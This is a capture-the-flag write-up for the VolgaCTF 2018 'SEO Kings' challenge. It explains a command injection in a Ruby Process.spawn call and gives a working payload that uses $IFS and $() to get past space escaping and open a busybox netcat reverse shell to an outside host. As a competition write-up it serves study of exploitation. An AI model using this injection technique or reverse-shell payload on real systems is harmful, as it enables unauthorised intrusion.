The site exposes SEO service which requests like this:

POST http://seo-kings.quals.2018.volgactf.ru:8080/ HTTP/1.1
Host: seo-kings.quals.2018.volgactf.ru:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

site=<my_url>

If an array is given as site parameter, like site[]=, the server emits an error:

NoMethodError at /
undefined method `gsub' for [""]:Array
file: rfc2396_parser.rb location: escape line: 305

And guess what? Some partial source code is revealed in the error message, and there is:

/opt/seo-kings/app/controllers/main_controller.rb in runAdmin
  pid = Process.spawn("phantomjs --web-security=no bot.js '" +  URI.escape(site)  + "'")
/opt/seo-kings/app/controllers/main_controller.rb in block in <class:MainController>
      runAdmin(site)

Look at pid = Process.spawn("phantomjs --web-security=no bot.js '" + URI.escape(site) + "'"). site is user input, and by URI.escape, '(0x27) is not escaped! So there is a command injection vulnerability.

Since all spaces including %20, %09-%0c and [], {} are escaped (and dollar sign is not escaped), I could use $IFS to make spaces in the command. Like, ls$IFS-al.

But if non-first arguments doesn't start with non-alphanumeric characters, it'll become like this:

nc 1.2.3.4 -> nc$IFS1.2.3.4 ?
$IFS1 is not defined, so it'll become nc .2.3.4.

Fortunately () is not escaped, so we can do like this:

nc$IFS$()1.2.3.4

$() is the output of empty command, which is zero-length character. It was used to separate IFS and other characters.

The final payload:

site=';busybox$IFS$()nc$IFS$()1.2.3.4$IFS$()10000$IFS$()-esh;'

After obtaining shell, I saw .bash_history in the user directory, which has this:

vi file_wiht_flag.rb

I ran find / -name file_wiht_flag.rb, and there was:

...
'VolgaCTF{hope_it_was_like_madness}'
...